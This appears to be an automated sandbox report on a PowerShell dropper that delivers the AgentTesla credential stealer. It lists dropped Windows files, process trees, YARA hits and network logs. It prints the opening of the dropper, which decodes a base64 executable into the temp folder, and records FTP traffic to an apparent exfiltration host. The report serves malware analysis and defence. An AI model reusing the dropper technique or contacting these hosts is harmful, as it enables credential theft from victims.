SHA-512:	21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:	false
Preview:	........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

C:\Windows\System32\PerfStringBackup.TMP

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	840878
Entropy (8bit):	3.4224066455051885
Encrypted:	false
SSDEEP:	3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:	D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:	1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:	AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
SHA-512:	21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:	false
Preview:	........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

C:\Windows\System32\perfc009.dat

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	137550
Entropy (8bit):	3.409189992022338
Encrypted:	false
SSDEEP:	1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
MD5:	084B771A167854C5B38E25D4E199B637
SHA1:	AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
SHA-256:	B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
SHA-512:	426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
Malicious:	false
Preview:	1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

C:\Windows\System32\perfh009.dat

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	715050
Entropy (8bit):	3.278818886805871
Encrypted:	false
SSDEEP:	3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
MD5:	342BC94F85E143BE85B5B997163A0BB3
SHA1:	8780CD88D169AE88C843E19239D9A32625F6A73E
SHA-256:	F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
SHA-512:	0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
Malicious:	false
Preview:	3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

Static File Info

General

File type:	ASCII text, with very long lines (65494), with CRLF line terminators
Entropy (8bit):	5.979094057562067
TrID:
File name:	7dtpow.ps1
File size:	393'336 bytes
MD5:	5c540d4108cce10839d48d7a8ba97c11
SHA1:	cf410d7dfe50cbebec376464968a1a6035f778f1
SHA256:	65808985955d6c5df16a4679a0fca5437ab7b2a07eb55c240de1b8d22ae3b8c3
SHA512:	7098674e66ab8761e37f2aa4382e0bdb363605bfea0712b8ef8767809d1baae03ff97023f07e17555a9da09162260261294b8a63049ac48bc76448f6844b5e0b
SSDEEP:	6144:iz/Q0tevGcnK8XXHRSR0aiZd1kHY9LrNi76Dl6WiCAqeHbqg/dz71:A4yApnlXx40rr10sLrQ7W6ZCALqgVP1
TLSH:	EA84DF318908B42FCEEF1F4379251FD73CB9213BCEA45028A14F59B99E24229587BF64
File Content Preview:	$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu

File Icon


Icon Hash:	3270d6baae77db44

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:53:02.275281906 CET	49704	80	192.168.2.5	208.95.112.1
Jan 8, 2025 16:53:02.280142069 CET	80	49704	208.95.112.1	192.168.2.5
Jan 8, 2025 16:53:02.280869961 CET	49704	80	192.168.2.5	208.95.112.1
Jan 8, 2025 16:53:02.281725883 CET	49704	80	192.168.2.5	208.95.112.1
Jan 8, 2025 16:53:02.286467075 CET	80	49704	208.95.112.1	192.168.2.5
Jan 8, 2025 16:53:02.757196903 CET	80	49704	208.95.112.1	192.168.2.5
Jan 8, 2025 16:53:02.817322016 CET	49704	80	192.168.2.5	208.95.112.1
Jan 8, 2025 16:53:03.995510101 CET	49705	21	192.168.2.5	162.241.62.63
Jan 8, 2025 16:53:04.000557899 CET	21	49705	162.241.62.63	192.168.2.5
Jan 8, 2025 16:53:04.000638008 CET	49705	21	192.168.2.5	162.241.62.63
Jan 8, 2025 16:53:04.008128881 CET	49705	21	192.168.2.5	162.241.62.63
Jan 8, 2025 16:53:04.012908936 CET	21	49705	162.241.62.63	192.168.2.5
Jan 8, 2025 16:53:04.012989044 CET	49705	21	192.168.2.5	162.241.62.63
Jan 8, 2025 16:53:53.677505970 CET	49704	80	192.168.2.5	208.95.112.1
Jan 8, 2025 16:53:53.682468891 CET	80	49704	208.95.112.1	192.168.2.5
Jan 8, 2025 16:53:53.682539940 CET	49704	80	192.168.2.5	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:53:02.239588976 CET	53758	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:53:02.246149063 CET	53	53758	1.1.1.1	192.168.2.5
Jan 8, 2025 16:53:03.678634882 CET	56830	53	192.168.2.5	1.1.1.1
Jan 8, 2025 16:53:03.993742943 CET	53	56830	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 16:53:02.239588976 CET	192.168.2.5	1.1.1.1	0xb2a1	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:53:03.678634882 CET	192.168.2.5	1.1.1.1	0xbc9b	Standard query (0)	ftp.antoniomayol.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 16:53:02.246149063 CET	1.1.1.1	192.168.2.5	0xb2a1	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:53:03.993742943 CET	1.1.1.1	192.168.2.5	0xbc9b	No error (0)	ftp.antoniomayol.com	antoniomayol.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 16:53:03.993742943 CET	1.1.1.1	192.168.2.5	0xbc9b	No error (0)	antoniomayol.com		162.241.62.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	208.95.112.1	80	1436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:53:02.281725883 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 8, 2025 16:53:02.757196903 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:53:02 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 58 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Target ID:	0
Start time:	10:52:57
Start date:	08/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:52:57
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:53:00
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x910000
File size:	294'912 bytes
MD5 hash:	10454890A3D7C7C0B7EC0BF7018141E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2092835508.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:53:00
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x450000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4515067403.000000000280F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4512063104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4515067403.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	10:53:41
Start date:	08/01/2025
Path:	C:\Windows\System32\wbem\WMIADAP.exe
Wow64 process (32bit):	false
Commandline:	wmiadap.exe /F /T /R
Imagebase:	0x7ff6cc130000
File size:	182'272 bytes
MD5 hash:	1BFFABBD200C850E6346820E92B915DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FF848E506D4 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110494637.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 357edb2ca5f4714df53738087389a44f11a4e715afff88a7ecfb203d17235702
Instruction ID: 008e695b53bed399ccd8cd3593f0f004ce24f96931a5f27c68025fe3c0ab5e61
Opcode Fuzzy Hash: 357edb2ca5f4714df53738087389a44f11a4e715afff88a7ecfb203d17235702
Instruction Fuzzy Hash: 32915672E0CE894FE799BA6C985A6B5B7D1FF95750F0801BAE40DC3193DB24AC01C786

Function 00007FF848E507F7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110494637.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c60676948732ec5066708ba7fd4c104fb42b8c0e824152aacee0f65a0a167e
Instruction ID: e3e25cb49ba2862771fdd5aba64182f9513bb57eb7233b47b8d6b56d58580598
Opcode Fuzzy Hash: f7c60676948732ec5066708ba7fd4c104fb42b8c0e824152aacee0f65a0a167e
Instruction Fuzzy Hash: DC110A72E1D9068FF6ACBA5C65555B9A2C1FF843A0F580179F80DC31C6DF286C4142CA

Function 00007FF848D837B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110140771.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848d80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: b95460bf11eb50dcd5d824fd60c4a58be9991c15ce2cb47472478d2f9a14ecaf
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 0C01447111CB094FDB48EF0CE451AA6B7E0FB95364F10056DE58AC3695D726E882CB45

Analysis Process: x.exePID: 1992, Parent PID: 6192COMMON

Execution Graph

Execution Coverage:	29.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	132
Total number of Limit Nodes:	0

Executed Functions

Function 02BC11E0 Relevance: 3.2, Strings: 2, Instructions: 655COMMON

Download Yara Rule

Strings

@, xrefs: 02BC1AF5
<, xrefs: 02BC1315

Memory Dump Source

Source File: 00000003.00000002.2091989553.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_x.jbxd

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 3e98f42adb4d4a96bb536253e4d52e27827bc3f81ee849cd04066ff3775832c4
Instruction ID: ae08362566bc86b86c40b9bade29ce106c89a8531072d2c677ff79077f031ab8
Opcode Fuzzy Hash: 3e98f42adb4d4a96bb536253e4d52e27827bc3f81ee849cd04066ff3775832c4
Instruction Fuzzy Hash: 74627DB4E11219CFDB64CF69C980A9DBBF2FF49311F65D1A9D408AB216D730AA81CF50

Function 02BC0848 Relevance: 3.1, Strings: 2, Instructions: 611COMMON

Download Yara Rule

Strings
